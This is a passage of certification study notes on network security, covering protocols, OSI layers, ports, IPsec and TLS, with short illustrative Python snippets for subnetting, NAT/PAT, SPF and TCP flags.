allowing the use of private IP addresses, and enables multiple internal clients to obtain internet access through a
few public IP addresses; NAT is supported by many security border devices, such as firewalls, routers,
gateways, WAPs, and proxies; NAT is useful when specific devices need to be accessible from outside the
network, like servers that host websites; also see PAT; The main difference between NAT and PAT is that PAT
uses port numbers to map private IP addresses to a public IP address, while NAT does not
Network-based IDS (NIDS): a network based IDS can monitor activity on a network, and isn't necessarily
visible to an attacker
Network container names: network containers by OSI layer: 7,6,5: protocol data unit (PDU); layer 4: segment
(TCP) or datagram (UDP); layer 3: packet; layer 2: frame; layer 1: bit
NFV: Network Function Virtualization (AKA Virtual Network Function) goal is to decouple functions, such as
firewall management, intrusion detection, NAT and name service resolution from specific hardware solutions,
and make them virtual/software; the focus is to optimize distinct network services
Nonroutable IP addresses: from RFC 1918; 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
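A quick way to test membership in these RFC 1918 ranges with the stdlib `ipaddress` module:

```python
import ipaddress

# The three nonroutable (private) IPv4 blocks defined by RFC 1918
RFC1918_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_rfc1918(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918_NETS)

assert is_rfc1918("172.20.1.9")      # inside 172.16.0.0/12
assert not is_rfc1918("172.32.0.1")  # just outside the /12
```

Note the 172 block is a /12, so it spans 172.16.0.0 through 172.31.255.255, a common exam trap.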
Northbound/Southbound interface: A northbound interface lets a specific component communicate with a
higher-level component in the same network; a southbound interface is the opposite — enabling a specific
component to communicate with a lower-level component
Online Certificate Status Protocol (OCSP): a real-time method for verifying the status of an X.509 (e.g.
SSL/TLS) digital certificate
Packet-Switched Network: a network that doesn't use a dedicated connection between endpoints; packet
switching occurs when the message or communication is broken up into small segments and sent across
intermediary networks to the destination; within packet-switching systems are two types of communication
paths (or virtual circuits): permanent virtual circuits (PVCs) and switched virtual circuits (SVCs)
Password Authentication Protocol (PAP): a password-based protocol that verifies users for Point-to-Point
Protocol (PPP); PAP transmits usernames and passwords in cleartext
Peering: a method for two or more networks to exchange data directly with each other without going through a
third party; a cost-effective way for networks to connect and improve performance; peering can be public (e.g.
connection through an internet exchange point) or private (e.g. colocation)
Phreaking: type of attack using various types of tech to circumvent the telephone system to make long-
distance calls, alter the phone service function, steal services, or cause service disruptions; a phreaker is the
phreaking attacker
Ping of Death (ping-of-death): an attack that sends numerous oversized ping packets to the victim, causing a
freeze, crash, or reboot
Plain Old Telephone Service (POTS): refers to the traditional, analog voice telephone service that has been in
use since the late 19th century; it operates over copper twisted-pair wires and provides basic telephone
functions like voice calling and fax transmission; POTS uses circuit-switched technology, establishing a
dedicated connection for the duration of a call; known for its reliability and simplicity, offering standard features
such as dial tone, ring tone, and support for analog devices like modems and fax machines
PLC: Packet Loss Concealment used in VoIP communications to mask the effect of dropped packets
Point-to-Point Protocol (PPP): an encapsulation protocol designed to support the transmission of IP traffic
over dial-up or point-to-point links; a standard method for transporting multiprotocol datagrams over point-to-
point links; original PPP options for authentication were PAP, CHAP, and EAP
Point-to-Point Tunneling Protocol (PPTP): an outdated VPN protocol that creates a secure tunnel for data
over IP networks, primarily for remote access; operates at Layer 2 (Data Link Layer) of the OSI model, PPTP
encapsulates data within IP packets but provides only basic encryption, making it relatively fast but less secure
by modern standards; due to its weaker security, PPTP has largely been replaced by more robust VPN
protocols, such as L2TP/IPsec and OpenVPN
Ports: associated with services on network architectures; 65,536 ports (0-65535) in total
Ports 0-1023: associated with common services
Ports 1024-49151: registered ports used with non-system applications associated with vendors and devs
Ports 49152-65535: dynamic ports (AKA private or non-reserved ports) used as temporary ports, often in
association when a service is requested via a well-known port
Port Address Translation (PAT): a type of NAT which allows multiple devices on a private network to use the
same public IP address by assigning each device a unique port number; PAT is useful when multiple devices
need internet access but there aren't many public IP addresses available; an extension of NAT translating all
addresses to one routable IP address and translating the source port number in the packet to a unique value
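A hypothetical sketch of the idea — a PAT device keeps a translation table so many inside (IP, port) pairs share one public IP, each mapped to a unique public port (class name, addresses, and port range are all illustrative):

```python
PUBLIC_IP = "203.0.113.5"  # documentation-range address (illustrative)

class PatTable:
    def __init__(self):
        self.next_port = 40000
        self.mappings = {}  # (private_ip, private_port) -> (PUBLIC_IP, public_port)

    def translate_outbound(self, private_ip: str, private_port: int):
        key = (private_ip, private_port)
        if key not in self.mappings:
            # Each new inside flow gets the shared public IP plus a unique port
            self.mappings[key] = (PUBLIC_IP, self.next_port)
            self.next_port += 1
        return self.mappings[key]

pat = PatTable()
a = pat.translate_outbound("192.168.1.10", 5000)
b = pat.translate_outbound("192.168.1.11", 5000)
assert a[0] == b[0] == PUBLIC_IP  # both flows share one public address
assert a[1] != b[1]               # ...distinguished by unique public ports
```

Return traffic is matched against the same table in reverse, which is how one routable address serves an entire private network.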
Private Branch Exchange (PBX): a private telephone network used within an org or enterprise, allowing
internal users to communicate with each other and share a certain number of external phone lines for making
outgoing calls; a PBX system manages incoming and outgoing calls, offering features such as call routing,
voicemail, call conferencing, extension dialing, and automated attendants; modern PBX systems can be
hardware-based, software-based, or hosted in the cloud, and they often support both traditional analog lines
and digital communication methods like VoIP (Voice over Internet Protocol); countermeasures to PBX fraud
include many of the same controls you would employ to protect a network (e.g. logical or technical,
administrative and physical controls)
Proximity device/reader: proximity devices can be passive, field-powered, or transponder; when a device
passes near a proximity reader, the reader is able to determine the identity and authorization status of the
bearer
Public Switched Telephone Network (PSTN): the global network of interconnected voice-oriented public
telephone systems; encompasses the world's circuit-switched telephone networks operated by national,
regional, and local telephony operators; the PSTN enables landline telephony and is responsible for routing calls
between different telephone networks, both domestically and internationally; uses a combination of copper
wires, fiber optics, microwave transmission, and undersea cables to facilitate voice communication across vast
distances
Race condition: AKA race hazard, the condition of an electronics, software, or other system where the
system's substantive behavior is dependent on the sequence or timing of other uncontrollable events, leading to
unexpected or inconsistent results
RPC: Remote Procedure Call is a protocol that enables one system to execute instructions on other hosts across
a network infrastructure
Root of Trust: a source that can always be trusted within a cryptographic system; because cryptographic
security is dependent on keys to encrypt and decrypt data and perform functions such as generating digital
signatures and verifying signatures, RoT schemes generally include a hardened hardware module; a RoT
guarantees the integrity of the hardware prior to loading the OS of a computer
Screened subnet: AKA DMZ (or demilitarized zone) is a network security architecture that uses firewalls to
create a barrier between the public internet and the internal network, allowing only controlled access to
external-facing servers while protecting the internal network from potential attacks
Sender Policy Framework (SPF): an email authentication protocol that helps verify if an email claiming to come
from a specific domain is sent by an authorized mail server; SPF works by allowing domain owners to publish a
list of approved sending IP addresses in their DNS records; when an email is received, the recipient's server
checks the SPF record to ensure the email was sent from an authorized IP; if the IP is listed, the email is more
likely to be legitimate and if not, it may be flagged as spam or rejected, helping to prevent email spoofing and
phishing
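The record-checking logic above can be sketched with Python's standard `ipaddress` module; a simplified illustration only (the function name and sample record are hypothetical, and real SPF evaluation per RFC 7208 also handles `a`/`mx`/`include`/`redirect` mechanisms and qualifiers), checking just the `ip4:`/`ip6:` terms:

```python
import ipaddress

def authorized_by_spf(spf_record: str, sender_ip: str) -> bool:
    """Check a sender IP against the ip4:/ip6: mechanisms of an SPF record.

    Simplified sketch -- real SPF evaluation (RFC 7208) also handles
    a/mx/include/redirect mechanisms and qualifiers.
    """
    ip = ipaddress.ip_address(sender_ip)
    for term in spf_record.split():
        if term.startswith(("ip4:", "ip6:")):
            network = ipaddress.ip_network(term.split(":", 1)[1], strict=False)
            if ip in network:  # version mismatch simply evaluates to False
                return True
    return False

# Example record a domain owner might publish as a DNS TXT record:
record = "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all"
print(authorized_by_spf(record, "192.0.2.55"))    # True: inside the listed range
print(authorized_by_spf(record, "198.51.100.7"))  # False: not listed
```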
SIPS: secure version of the Session Initiation Protocol for VoIP, adds TLS encryption to keep the session
initiation process secure
Stateless Address Autoconfiguration (SLAAC): a method in IPv6 where devices automatically configure their
IP addresses without relying on a DHCP server, using Router Advertisements (RAs) to obtain network prefixes,
which they combine with their own interface identifiers to create unique addresses
Smartcard: credit card-sized IDs, badges, or security passes with a magnetic stripe, bar code, or integrated
circuit chip, containing info about the authorized bearer; used for identification or auth purposes; smartcards
can include microprocessors and cryptographic certificates
S/MIME: provides the following cryptographic security services for electronic messaging applications:
- Authentication
- Message integrity
- Non-repudiation of origin (using digital signatures)
- Privacy
- Data security (using encryption)
S/MIME specifies the MIME type application/pkcs7-mime (smime-type "enveloped-data") for data
enveloping (encrypting) where the whole (prepared) MIME entity to be enveloped is encrypted and
packed into an object which subsequently is inserted into an application/pkcs7-mime MIME entity
S/MIME is a standard for public key encryption, providing security services for digital messaging apps
S/MIME requires the use of a PKI in order to work properly
S/MIME is the emerging standard for secure email / encrypted messages
SNMP: Simple Network Management Protocol, is a protocol for collecting and organizing info about managed
devices on IP networks; it can be used to determine the health of devices such as routers, switches, servers,
workstations, etc
Smurf attack: ICMP echo request sent to the network broadcast address of a spoofed victim causing all nodes
to respond to the victim with an echo reply; a smurf attack is a form of DoS employing an amplification network
to send numerous response packets to the victim
SPML: Service Provisioning Markup Language is XML-based and designed to allow platforms to generate and
respond to provisioning requests; uses the concepts of a requesting authority, a provisioning service point, and a
provisioning service target; requesting authorities issue SPML requests to a provisioning service point;
provisioning service targets are often user accounts, and must allow unique identification of the data in their
implementation
STARTTLS: an email protocol command that upgrades an existing, insecure connection to a secure, encrypted
connection using TLS (Transport Layer Security); commonly used in SMTP (Simple Mail Transfer Protocol), as
well as IMAP and POP3 for email retrieval; when STARTTLS is enabled, email servers negotiate encryption with
each other, protecting the email content and credentials from interception during transmission
SRTP: Secure Real-time Transport Protocol is an extension of Real-time Transport Protocol (RTP) that adds
encryption, confidentiality, message authentication, and replay protection to audio and video traffic
Multi-tiered firewall: tiers are not the number of firewalls but the number of zones protected by the firewall; a
2-tier firewall protects two zones
Network Polling: a communication method used in network systems where a central controller or master
device periodically checks, or "polls," each connected device (node) to determine if it has data to transmit or to
monitor its status; method ensures orderly communication by controlling when devices can send data,
preventing data collisions and efficiently managing network traffic
TCP ACK scan: a type of network discovery scan that attempts to simulate an already-established connection
by sending a lone ACK packet, as if from the middle of an existing session
Teardrop attack: exploits reassembly of fragmented IP packets in the fragment offset field (indicating the start
position or offset of data contained in a fragmented packet)
Terminal Emulation Protocol: designed to provide access between hosts; allows a computer to act like a
traditional terminal and send commands to / receive output from a remote system via a text-based interface;
examples include Telnet, SSH, and Kermit
Token Passing: a network access method used to control which devices can transmit data at any given time; a
special data packet called a "token" circulates among the connected devices (nodes), and only the device that
holds the token is permitted to send data over the network
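The token-holding rule above can be simulated in a few lines (node names and queued frames are hypothetical, for illustration only):

```python
from collections import deque

# Token passing simulation: only the node currently holding the token may transmit.
nodes = deque(["A", "B", "C", "D"])
queued = {"A": [], "B": ["frame1"], "C": [], "D": ["frame2"]}

transmitted = []
for _ in range(len(nodes)):          # one full circulation of the token
    holder = nodes[0]                # the node at the front holds the token
    if queued[holder]:
        transmitted.append((holder, queued[holder].pop(0)))
    nodes.rotate(-1)                 # pass the token to the next node

print(transmitted)  # [('B', 'frame1'), ('D', 'frame2')]
```

Because transmission is serialized by the token, no two nodes ever send at once, which is how the access method avoids collisions.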
Tunneling: the encapsulation of protocol-deliverable message within a second protocol; the second protocol
often performs encryption to protect the message contents
Unbound (Wireless) Network: network where the physical layer interconnections are done using radio, light, or
some other means (not confined to wires, cables, or fibers); may or may not be mobile
VLAN hopping: a method of attacking the network resources of a VLAN by sending packets to a port not
usually accessible from an end system; the goal of this form of attack is to gain access to other VLANs on the
same network
Virtual Routing and Forwarding (VRF): allows multiple routing tables to be used on the same device
simultaneously, similar to the concept of a VLAN (which is layer 2), but operating at layer 3; because routing
instances operate independently, VRF allows IP addresses to overlap without conflict which supports
segmentation and permits flexibility for zero trust implementations
WAF: Web Application Firewall is a software-based app that monitors and filters exchanges between
applications and a host; usually inspects and filters HTTP/S conversations
X.509: an ITU standard defining the format of public key certificates; X.509 certificates are used in many
Internet protocols, including TLS/SSL, which is the basis for HTTPS; they are also used in offline applications,
like electronic signatures
XDR: extended detection and response (XDR) components usually include EDR, MDR, and EPP elements; XDR
is not solely focused on endpoints, often including NTA, NIDS, and NIPS functionality
4.1 Apply secure design principles in network architectures (OSG-10 Chpts 11,12)
4.1.1 Open System Interconnection (OSI) and Transmission Control Protocol/Internet Protocol (TCP/IP) models
TCP/IP: AKA DARPA or DOD model has four layers: Application (AKA Process), Transport (AKA Host-to-
Host), Internet (AKA Internetworking), and Link (AKA Network Interface or Network Access)
OSI: Open Systems Interconnection (OSI) Reference Model developed by ISO (International Organization
for Standardization) to establish a common communication structure or standard for all computer
systems; it is an abstract framework
- Communication between layers via encapsulation (at each layer, the previous layer's header and
payload become the payload of the current layer) and de-encapsulation (inverse action occurring as
data moves up layers)
| Layer | OSI model | TCP/IP model | PDU | Devices | Protocols |
|---|---|---|---|---|---|
| 7 | Application | Application | Data | Application Firewall | HTTP/S, DNS, DHCP, FTP, LPD, S-HTTP, SMTP, TFTP, Telnet, SSH, POP3, PEM, IMAP, NTP, SNMP, TLS/SSL, BGP, SIP, S/MIME, X Window, NFS, etc. |
| 6 | Presentation | Application | Data | | JPEG, ASCII, MIDI, etc. |
| 5 | Session | Application | Data | Circuit Proxy Firewall | NetBIOS, RPC |
| 4 | Transport | Transport (host-to-host) | Segments (TCP) / Datagrams (UDP) | | TCP (connection-oriented), UDP (connectionless), TLS, BGP |
| 3 | Network | Internet/IP | Packets | Router, Multilayer Switch, Packet Filtering Firewall | IPv4, IPv6, IPSec, OSPF, EIGRP, ICMP, IGMP, RIP, NAT |
simplex: one-way
half-duplex: both comm devices can transmit/receive, but not at the same time
full-duplex: both comm devices can transmit/receive at same time
data transfer
connection release
Uses data streams
Protocols at layer 5 include NetBIOS and RPC
Transport Layer (4)
Responsible for managing the integrity of a connection and controlling the session; providing
transparent data transport and end-to-end transmission control
Defines session rules like how much data each segment can contain, how to verify message
integrity, and how to determine whether data has been lost
Protocols that operate at the Transport layer:
Transmission Control Protocol (TCP)
the major transport protocol in the internet suite of protocols providing reliable,
connection-oriented, full-duplex streams
a full-duplex, connection-oriented protocol
uses a three-way handshake consisting of three steps: synchronize (SYN),
synchronize-acknowledge (SYN-ACK), and acknowledge (ACK)
TCP header flags:
URG ACK PSH RST SYN FIN (mnemonic: Unskilled Attackers Pester Real
Security Folks)
TCP Packet Header: 10 fields, 160 bits, including source port, destination port,
sequence number, acknowledgement number, checksum etc
User Datagram Protocol (UDP)
connectionless protocol that provides fast, best-effort delivery of datagrams
(self-contained units of data)
UDP Datagram Header: 4 fields, 64 bits, including source port, destination port,
length of data, checksum
Transport Layer Security (TLS)
note: in the OSI model, TLS operates on four layers: Application, Presentation,
Session, and Transport; in the TCP/IP model, it operates only on the Transport
layer
BGP: Border Gateway Protocol - used to exchange routing and reachability information
between routers (looking at available paths, picking the best)
Segmentation, sequencing, and error checking occur at the Transport layer
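The TCP header fields and flags listed above can be seen by packing and unpacking a raw 20-byte header with Python's `struct` module (the port, sequence, and window values below are hypothetical sample data):

```python
import struct

# TCP header layout (RFC 793): src port, dst port, seq, ack,
# data offset/reserved, flags, window, checksum, urgent pointer = 20 bytes
TCP_HEADER = struct.Struct("!HHIIBBHHH")

FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]  # flag bits 0..5

def parse_tcp_flags(header: bytes) -> list[str]:
    (src, dst, seq, ack, offset_reserved, flags,
     window, checksum, urgent) = TCP_HEADER.unpack(header[:20])
    return [name for bit, name in enumerate(FLAG_NAMES) if flags & (1 << bit)]

# A hypothetical SYN segment from ephemeral port 54321 to port 443:
syn = TCP_HEADER.pack(54321, 443, 1000, 0, 5 << 4, 0x02, 65535, 0, 0)
print(parse_tcp_flags(syn))  # ['SYN']
```

The same parser applied to a segment with flags `0x12` would report `SYN` and `ACK`, the second step of the three-way handshake.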
Network Layer (3)
Responsible for logical addressing, and providing routing or delivery guidance (but not
necessarily verifying guaranteed delivery), manages error detection and traffic control
Internet Control Message Protocol (ICMP): allows network devices to send error and
control messages and provides Ping and Traceroute utilities
Internet Group Management Protocol (IGMP): allows hosts and adjacent routers on IP
networks to establish multicast group memberships
routing protocols: move routed protocol messages across a network
includes RIP, OSPF, IS-IS, IGRP, IGMP, and BGP
routing protocols are defined at the Network Layer and specify how routers
communicate
routing protocols can be static or dynamic, and categorized as interior or exterior
PPTP: Point-to-Point Tunneling Protocol - used for creating VPNs; does not itself provide
encryption/authentication and is considered obsolete
PPP: Point-to-Point Protocol - encapsulates IP traffic so that it can be transmitted over
analog connections and provides authentication, encryption, and compression;
replaced SLIP; authentication protocols include Password Authentication Protocol
(PAP), Challenge-Handshake Authentication protocol (CHAP), and Extensible
Authentication Protocol (EAP)
RARP: Reverse Address Resolution Protocol - translates a MAC address to an IP
address
Physical Layer (1)
Converts a frame into bits for transmission/receiving over the physical connection medium
Network hardware devices that function at layer 1 include NICs, hubs, repeaters,
concentrators, amplifiers
Know four basic network topologies:
star: each individual node on the network is directly connected to a
switch/hub/concentrator
mesh: all systems are interconnected; partial mesh can be created by adding multiple
NICs or server clustering
ring: closed loop that connects end devices in a continuous ring (all communication
travels in a single direction around the ring);
Multistation Access Unit (MSAU or MAU) connects individual devices
used in token ring and FDDI networks
bus: all devices are connected to a single cable (backbone) terminated on both ends
Know commonly used twisted-pair cable categories
Know cable types & characteristics
Protocols:
802.11: a family of protocols for wireless local area networks including 802.11a, b, g, n,
ac, ax
Common TCP Ports

| Port | Protocol |
|------|----------|
| 20, 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP |
| 53 | DNS |
| 80 | HTTP |
| 110 | POP3 |
| 137-139 | NetBIOS |
| 143 | IMAP |
| 389 | LDAP |
| 443 | HTTPS |
| 445 | AD, SMB |
| 636 | Secure LDAP |
| 1433 | MS SQL Server |
| 3389 | RDP |
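Whether a TCP port is reachable can be sketched with a full `connect()` probe, the simplest form of port check; a minimal sketch using only the standard `socket` module (the function name is illustrative), demonstrated against a listener the script starts itself:

```python
import socket

def tcp_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Attempt a full TCP connection (three-way handshake); 0 means success."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# Demonstrate against a listener we control, on an ephemeral port:
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))   # 0 = let the OS pick a free port
listener.listen(1)
port = listener.getsockname()[1]

print(tcp_port_open("127.0.0.1", port))  # True: something is listening
listener.close()
print(tcp_port_open("127.0.0.1", port))  # False: listener is gone
```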
4.1.2 Internet Protocol (IP) version 4 and 6 (IPv6) (e.g., unicast, broadcast, multicast, anycast)
IP is part of the TCP/IP (Transmission Control Protocol/Internet Protocol) suite
TCP/IP is the name of IETF's four-layer networking model, and its protocol stack; the four layers are:
link (physical), internet (network-to-network), transport (channels for connection/connectionless
data exchange) and application (where apps make use of network services)
IP provides the foundation for other protocols to be able to communicate; IP itself is a
connectionless protocol
IPv4: dominant protocol that operates at layer 3; IP is responsible for addressing packets, using 32-
bit addresses
IPv6: modernization of IPv4, uses 128-bit (16-byte) addresses, supporting 2^128 total addresses;
makes IPSec mandatory
TCP or UDP is used to communicate over IP
IP Subnetting: method used to divide a large network into smaller, manageable pieces, called
subnets
IP addresses: like a street address that identifies a device on a network in two parts:
network: identifies the "neighborhood" or network of the device
host: specifies the device (or "house") in that neighborhood
subnet mask: tool to divide the IP address into its network and host parts; e.g. 192.168.1.15
with subnet mask of 255.255.255.0 tells us that 192.168.1 is the network, and 15 is the host or
device part
CIDR notation: a compact way of representing IP addresses and their associated network masks
example: 192.168.1.0/24
consists of two parts:
IP address: 192.168.1.0 - the network or starting address
/24 - specifies how many bits of the IP address are used for the network part;
here /24 means the first 24 bits (out of 32 for IPv4) are used for the network
part, and the remaining bits are used for the host addresses in that network
/24 is the same as 255.255.255.0 (where the 24 bits represented by 255.255.255
define the network, and .0 defines the host range)
IP address range: 192.168.1.0/24 represents the network 192.168.1.0 and all IPs from
192.168.1.1 to 192.168.1.254; 2^8 = 256 IP addresses, but 254 are usable (excluding the
network and broadcast addresses)
other examples:
10.0.0.0/16: where /16 means the first 16 bits are reserved for the network, leaving 16
bits for hosts; allows 2^16 or 65,536 IP addresses, with 65,534 usable addresses
172.16.0.0/12: /12 means 12 bits are for the network, leaving 20 bits for hosts; providing
2^20 = 1,048,576 IP addresses
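The CIDR arithmetic above can be verified with Python's standard `ipaddress` module:

```python
import ipaddress

net = ipaddress.ip_network("192.168.1.0/24")
print(net.netmask)            # 255.255.255.0
print(net.num_addresses)      # 256 total addresses
print(net.num_addresses - 2)  # 254 usable (minus network & broadcast)
print(net.network_address)    # 192.168.1.0
print(net.broadcast_address)  # 192.168.1.255

# The other examples from above:
print(ipaddress.ip_network("10.0.0.0/16").num_addresses)    # 65536
print(ipaddress.ip_network("172.16.0.0/12").num_addresses)  # 1048576
```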
Network Classes: an IPv4 class A network contains 16,777,216 addresses (16,777,214 usable);
class B contains 65,536 (65,534 usable); class C contains 256 (254 usable)
IPSec provides data authentication, integrity and confidentiality
specifically, IPsec provides encryption, access control, nonrepudiation, and message
authentication using public key cryptography
Anycast: nearest or best; helpful when using CDN (content distribution network), which is about getting
data as physically close to the user as possible; anycast will ensure that I'm connected to the source that
will provide the best/fastest source
Application Layer: defines protocols for node-to-node application communication and provides services
to the application software running on a computer
Broadcast: a one-to-all communication method where data is sent from one sender to all possible
receivers within a network segment; in broadcasting, a single data packet is transmitted, and all devices
on the network receive it, regardless of whether they need the information
Internet Layer: defines the protocols for logically transmitting packets over the network
Logical address: occurs when an address is assigned and used by software or a protocol rather than
being provided/controlled by hardware
Network layerʼs packet header includes the source and destination IP addresses
Multicast: is a one-to-many communication method where data is transmitted from one sender to
multiple specific receivers who are part of a multicast group; unlike broadcast, multicast only targets
devices that have expressed interest in receiving the data, making it more efficient by conserving
bandwidth and reducing unnecessary network load; used for live video streaming, online gaming, and
conferencing
Network Access Layer: defines the protocols and hardware required to deliver data across a physical
network
Unicast: a one-to-one communication method where data is transmitted from a single sender to a single
receiver; in unicast, each data packet is sent directly to a specific destination address, and is the most
common form of internet communication, where data is exchanged between individual devices
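A unicast exchange can be sketched with two UDP sockets on the loopback interface (the payload and use of ephemeral ports are arbitrary choices for the example):

```python
import socket

# Unicast: one sender, one specific receiver (here both on loopback)
receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
receiver.bind(("127.0.0.1", 0))   # 0 = let the OS pick a free port
receiver.settimeout(5)
addr = receiver.getsockname()

sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender.sendto(b"hello", addr)     # datagram addressed to exactly one destination

data, peer = receiver.recvfrom(1024)
print(data)  # b'hello'
sender.close()
receiver.close()
```

Broadcast and multicast differ only in the destination address (a broadcast or group address) and the socket options that must be enabled, not in the basic send/receive pattern.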
Transport Layer: defines protocols for setting up the level of transmission service for applications; this
layer is responsible for the reliable transmission of data and the error-free delivery of packets
4.1.3 Secure protocols (e.g., Internet Protocol Security (IPSec), Secure Shell (SSH), Secure Sockets Layer
(SSL)/Transport Layer Security (TLS))
Kerberos: standards-based network authentication protocol, used in many products (most notably
Microsoft Active Directory Domain Services or AD DS)
Kerberos is mostly used on LANs for organization-wide authentication, single sign-on (SSO) and
authorization; Kerberos's primary function is authentication, and it also provides confidentiality and
integrity protection for its tickets and session keys
SSL and TLS: data protection; used for protecting website transactions (e.g. banking, e-commerce)
SSL and TLS both offer data encryption, integrity and authentication
TLS has supplanted SSL (the original protocol, considered legacy/insecure)
TLS was initially introduced in 1999 but didnʼt gain widespread use until years later
The original versions of TLS (1.0 and 1.1) are considered deprecated and organizations should be
relying on TLS 1.2 or 1.3
The de facto standard for secure web traffic is HTTP over TLS, which relies on hybrid cryptography:
using asymmetric cryptography to exchange an ephemeral session key, which is then used to carry
on symmetric cryptography for the remainder of the session
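As one concrete illustration of the TLS 1.2+ guidance above, a client context in Python's `ssl` module can be configured to refuse the deprecated versions (a minimal sketch):

```python
import ssl

# Client context with sane defaults (certificate verification, hostname check)
context = ssl.create_default_context()

# Refuse the deprecated TLS 1.0/1.1 (and SSL) versions noted above
context.minimum_version = ssl.TLSVersion.TLSv1_2

print(context.minimum_version == ssl.TLSVersion.TLSv1_2)  # True
print(context.check_hostname)                             # True
print(context.verify_mode == ssl.CERT_REQUIRED)           # True
```

A socket wrapped with this context (`context.wrap_socket(...)`) will fail the handshake against a server that only offers TLS 1.1 or older.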
Secure File Transfer Protocol (SFTP): a version of FTP that includes encryption and is used for
transferring files between two devices (often a client / server)
Secure Shell (SSH): remote management protocol, which operates over TCP/IP
all communications are encrypted
primarily used by IT administrators to manage devices such as servers and network devices
Internet Protocol Security (IPSec): an IETF standard suite of protocols that is used to connect nodes
(e.g. computers or office locations) together
IPsec protocol standard provides a common framework for encrypting network traffic and is built
into a number of common OSs
IPsec establishes a secure channel in either transport or tunnel mode
IPsec performs reauthentication of the client system throughout the connected session in order to
detect session hijacking
IPsec uses two protocols: Authentication Header (AH) and Encapsulating Security Payload (ESP) --
see below
widely used in virtual private networks (VPNs)
IPSec provides encryption, authentication and data integrity
transport mode: only packet payload is encrypted for peer-to-peer communication
tunnel mode: the entire packet (including header) is encrypted for gateway-to-gateway
communication
security association (SA): represents a simplex communication connection/session, recording
any config and status info
authentication header (AH): provides authentication, integrity, and nonrepudiation; provides
assurance of message integrity, authentication and access control, preventing replay attacks; does
not provide encryption; like an official authentication stamp, but it's not encrypted so anyone can
read it
encapsulating security payload (ESP): provides encryption of the payload, which provides
confidentiality and integrity of packet content; works with tunnel or transport mode; provides
limited authentication and prevents replay attacks (though not to the degree of AH)
Internet Security Association and Key Management Protocol (ISAKMP): an element of IKE used
to organize and manage encryption keys generated/exchanged by OAKLEY and SKEME; a security
association is the agreed-upon method of auth and encryption used by two entities; ISAKMP's use
of security associations enables IPsec to support multiple simultaneous VPNs from each host; the
Oakley protocol specifies a sequence of key exchanges and describes their services (such as
identity protection and authentication); and SKEME specifies the actual method of key exchange
Internet Key Exchange (IKE): a standard protocol used to set up a secure and authenticated
communication channel between two parties via a virtual private network (VPN); the protocol ensures
security for VPN negotiation, remote host and network access
4.1.4 Implications of multilayer protocols
TCP/IP is a multilayer protocol, and derives several associated benefits
this means that protocols can be encapsulated within others (e.g. HTTP is encapsulated within
TCP, which is in turn encapsulated in IP, which is in Ethernet), and additional security protocols can
also be encapsulated in this chain (e.g. TLS between HTTP and TCP, which is HTTPS)
note that VPNs use encapsulation to enclose (or tunnel) one protocol inside another
Multilayer benefits:
many different protocols can be used at higher layers
encryption can be incorporated (at various layers)
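The encapsulation chain described above can be illustrated with a toy sketch; the bracketed "headers" below are placeholders, not real wire formats, but the wrapping order matches the HTTP-in-TCP-in-IP-in-Ethernet nesting:

```python
def encapsulate(payload: bytes, header: bytes) -> bytes:
    """Each layer prepends its own header; the previous layer becomes the payload."""
    return header + payload

# Placeholder headers (real TCP/IP/Ethernet headers are binary structures):
http  = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
tcp   = encapsulate(http, b"[TCP hdr]")
ip    = encapsulate(tcp,  b"[IP hdr]")
frame = encapsulate(ip,   b"[Eth hdr]")

print(frame[:26])  # the three nested headers, outermost first

# De-encapsulation strips headers in reverse order as data moves up the stack:
assert frame[len(b"[Eth hdr]"):] == ip
```

Inserting TLS into the chain is just one more wrap between the HTTP and TCP steps, which is exactly how HTTPS is layered.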
Topology: how devices are interconnected (like bus, star, ring, tree, mesh)
Data plane: the "do-er"; forwards and switches packets across the network based on direction from the
control plane; within a switch, the data plane consists of the components that actually move the data; can
use cut-through or store-and-forward
Control plane: functions and processes that determine paths (route calculation/determination, e.g. OSPF,
BGP); the intelligence that determines the optimal path for data packets
Management plane: manages and monitors the network's operations; the overall
intelligence/configuration of the network
Physical topology: the physical connections between devices, and how they are connected to the
network; dictates how devices are physically linked and how they communicate over these physical
connections
Logical topology: defines how data actually flows within the network, regardless of its physical layout; e.g.
in a star-shaped physical network, the logical topology might be a bus if all communications are being
broadcast to all nodes
Cut-through: switch starts forwarding the packet as soon as it reads the destination address, without
waiting for the entire packet to be received; reduces latency but does not allow for error checking of the
entire packet
Store-and-forward: switch receives the entire packet, checks it for errors, and then forwards it to the
destination; introduces more latency, but ensures that the packet is error-free before forwarding
4.1.7 Performance metrics (e.g., bandwidth, latency, jitter, throughput, signal-to-noise ratio)
Bandwidth: the theoretical maximum amount of data that can be transmitted over a network or internet
connection in a given amount of time
Throughput: the actual rate of data successfully transferred over a network in a given amount of
time
Signal-to-noise ratio (SNR): measure of the level of the desired signal to the level of background noise;
a higher SNR allows for higher data rates
Latency: the time it takes for a signal to travel from its source to its destination and back (round-trip time,
usually measured in milliseconds)
Jitter: the variation in time delay between data packets over a network, measured in milliseconds; the
inconsistency of latency over time; you want low latency, low jitter, high SNR, and high throughput on
your network
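The latency and jitter definitions above can be computed from a set of ping samples; this sketch uses a simple jitter definition (mean absolute difference between consecutive latencies; RTP's RFC 3550 defines a smoothed variant of the same idea), and the sample values are hypothetical:

```python
def mean_latency(samples_ms: list[float]) -> float:
    """Average round-trip time across all samples."""
    return sum(samples_ms) / len(samples_ms)

def jitter(samples_ms: list[float]) -> float:
    """Mean absolute difference between consecutive latency samples."""
    diffs = [abs(b - a) for a, b in zip(samples_ms, samples_ms[1:])]
    return sum(diffs) / len(diffs)

# Hypothetical round-trip times in milliseconds:
rtts = [20.0, 22.0, 21.0, 25.0, 20.0]
print(mean_latency(rtts))  # 21.6
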